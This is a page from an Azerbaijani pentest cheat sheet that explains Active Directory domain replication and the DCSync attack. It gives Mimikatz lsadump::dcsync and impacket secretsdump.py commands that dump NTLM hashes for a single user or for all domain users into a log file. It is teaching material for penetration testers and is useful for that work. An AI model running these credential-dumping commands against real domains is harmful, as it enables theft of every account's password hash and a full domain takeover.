Pentest və SOC Cheat Sheet
  • Reconnaissance
  • Post-Explotation
    • Linux Post-Explotation
      • Linux Local Enumeration
      • Linux Privilege Escalation
      • Dumping and cracking hashes on Linux
      • Linux Persistence
    • Windows Post-Explotation
      • Windows Local Enumeration
      • Windows Privilege Escalation
      • Windows Persistence
  • Network Services Pentesting
    • 21-Pentesting FTP
    • 22-Pentesting SSH
    • 23-Pentesting Telnet
    • 53-Pentesting DNS
    • 25,465,587-Pentesting SMTP
    • 110,995-Pentesting POP
    • 139,445-Pentesting SMB
    • 3306-Pentesting MySQL
    • 3389-Pentesting RDP
    • 1433-Pentesting MSSQL-Microsoft SQL Server
    • 389,636,3268,3269-Pentesting LDAP
  • Web Pentesting
    • Broken Access Control
      • Praktiki nümunə
    • OS Command Injection
      • Praktiki nümunə
    • SQL Injection
      • Praktiki nümunə
    • Cross-Site-Scripting (XSS)
      • Praktiki nümunə
    • File Upload
      • Praktiki nümunə
    • Directory Traversal və Path Traversal
      • Praktiki nümunə
    • CSRF
    • XXE
    • Clickjacking
      • Praktiki nümunə
    • SSRF
      • Praktiki nümunə
    • JWT (Json Web Token)
      • Praktiki nümunə
    • Local&Remote File İnclusion
      • Praktiki nümunə
      • Local File inclusion ilə reverse shell almaq
    • 401&403 Bypass
    • Login Bypass
    • Open Redirect
    • Unicode Injection
    • Security Misconfiguration
    • CRLF injection
    • LDAP Injection
    • Cookies Hacking
    • Cross site WebSocket hijacking (CSWSH)
    • SSTI (Server Side Template Injection)
    • CSTI (Client Side Template Injection)
    • XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)
    • Registration & Takeover Vulnerabilities
    • Regular expression Denial of Service - ReDoS
    • Reset/Forgotten Password Bypass
    • SAML Hücumları
    • Reverse Tab Nabbing
    • Web Tool - WFuzz
    • XPATH enjeksiyonu
    • Server-Side Includes (SSI) Injection
    • Edge Side Inclusion Injection (ESII)
    • Race Condition
    • PostMessage
    • Parameter Pollution
    • Cache Poisoning and Cache Deception
    • Captcha Bypass
  • AD Pentesting
    • Domain Enumeration
      • PowerView ilə enumeration
      • AD Module ilə enumeration
      • BloodHound ilə enumeration
        • On Site BloodHound
      • Using Adalanche
        • Remote adalanche
      • Useful Enumeration Tools
    • Local Privilege Escalation
      • Useful Local Priv Esc Tools
      • UAC Bypass
    • Lateral Movement
      • Powershell Remoting
      • Mimikatz
      • Remote Desktop Protocol
      • URL File Attacks
      • Useful Tools
    • Domain Privilege Escalation
      • Kerberoast
      • ASREPRoast
      • Password Spray Attack
      • Force Set SPN
      • Abusing Shadow Copies
      • List and Decrypt Stored Credentials using Mimikatz
      • Unconstrained Delegation
      • Constrained Delegation
      • Resource Based Constrained Delegation
      • DNSAdmins Abuse
      • Abusing Active Directory-Integraded DNS (ADIDNS) poisoning
      • Abusing Backup Operators Group
      • SID History Abuse
      • Active Directory Certificate Services
    • Domain Persistence
      • Golden Ticket Attack
      • Silver Ticket Attack
      • Skeleton Key Attack
      • DSRM Abuse
      • DCsync Attack
    • Cross Forest Attacks
      • Trust Tickets
      • Abuse MSSQL Servers
      • Breaking Forest Trusts
  • SOC - Cheat Sheet
    • SOC Nədir?
    • SOC Komponentləri Nələrdir?
    • SOC Checklist
    • SIEM
      • Splunk Qurulması və Konfiqurasiyası
    • IDS/IPS
    • Firewall
    • Firewall qurulması və konfiqurasiyası
    • EDR/XDR
    • SOAR
    • Windows Commands for SOC analysts
      • GUI Programs in Windows
      • Event Viewer
      • Task Scheduler
      • Group Policy Editor
      • Device Manager
      • Task Manager
      • Registry Manager
    • Linux Commands for SOC analysts
    • LOLBAS Apps and Commands
      • Apps and Commands
Powered by GitBook
On this page

Was this helpful?

  1. AD Pentesting
  2. Domain Persistence

DCsync Attack

PreviousDSRM AbuseNextCross Forest Attacks

Last updated 1 year ago

Was this helpful?

Böyük təşkilatlarda hər domen üçün bir domen nəzarətçisinin olması kifayət deyil. Bu domenlər müxtəlif yerlərdə istifadə olunur və bir DC'in olması AD'də autentifikasiya xidmətlərini əhəmiyyətli dərəcədə gecikdirir. Buna görə də, təşkilatlar birdən çox DC'dən istifadə edir. Belə bir sual yarana bilər ki, iki fərqli ofisdə eyni etimadnamələrdən istifadə edərək autentifikasiya etmək necə mümkündür?

Bu sualın cavabı domen replikasiyasıdır. Hər bir domen nəzarətçisi Knowledge Consistency Checker (KCC) adlı bir proses idarə edir. KCC AD forest'i üçün replikasiya topologiyası yaradır və məlumatları sinxronlaşdırmaq üçün Remote Procedure Calls (RPC) vasitəsilə avtomatik olaraq digər domen nəzarətçiləri ilə əlaqə qurur. Bura istifadəçinin yeni parolu və yeni istifadəçinin yaradılması kimi məlumatlar daxildir. Buna görə parolunuzu dəyişdikdən sonra autentifikasiyadan əvvəl bir neçə dəqiqə gözləmək lazım olur, çünki parol dəyişikliyinin baş verdiyi DC, autentifikasiya etdiyiniz yerlə eyni olmaya bilər.

Bu replikasiya prosesi DC Sinxronizasiya adlanır. Replikasiyanı yalnız DC'lər yox, Domain Admins qruplarına aid olan hesablar da başlada bilər.bunu (yeni DC yaratmaq kimi qanuni məqsədlər üçün nəzərdə tutulub)

Bu cheatsheet'də populyar hücumlardan biri olan DC Sync hücumu haqqında yazacam. Domen replikasiyası icazələri olan hesaba girişimiz varsa, DC'dən etimadnamələri çəkmək üçün DC Sinxronizasiya hücumu həyata keçirilə bilər.

Bu hücum ilə etimadnamələri əldə etmək üçün Mimikatzın moldundan istifadə edə bilərik:

#Mimikatz istifadə edərək DCsync (Bunun üçün bizə DA hüquqları və ya DS-Replication-Get-Changes və DS-Replication-Get-Changes-All imtiyazlar lazımdır):
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<DomainName>\<AnyDomainUser>"'

#NTLM autentifikasiyası ilə impacketdən secretsdump.py istifadə edərək DCsync
secretsdump.py <Domain>/<Username>:<Password>@<DC'S IP or FQDN> -just-dc-ntlm

#Kerberos Autentifikasiyasl ilə impacket secretsdump.py istifadə edərək DCsync
secretsdump.py -no-pass -k <Domain>/<Username>@<DC'S IP or FQDN> -just-dc-ntlm

Praktiki nümayiş:

laba keçid edə bilərsiniz.

Spesifik bir istifadəçiyə qarşı DCSync hücumu həyata keçirmək üçün aşağıdakı əmrdən istifadə edirəm:

mimikatz # lsadump::dcsync /domain:<FQDN> /user:<Aşağı səlahiyyətli istifadəçinin adı>

Hesabın cari NTLM hashı da daxil olmaqla kifayət qədər məlumat əldə edirik.

Bütün hesablara DCSync hücumu həyata keçirmək üçün Mimikaztda loglamanı aktivləşdiririk:

log <username>_dcdump.txt

Aşağıdakı əmrdən istifadə edərək domendəki bütün istifadəçilərə DSSync hücumu həyata keçiririk və nəticə faylda saxlanır:

lsadump::dcsync /domain:<FQDN> /all
Buradan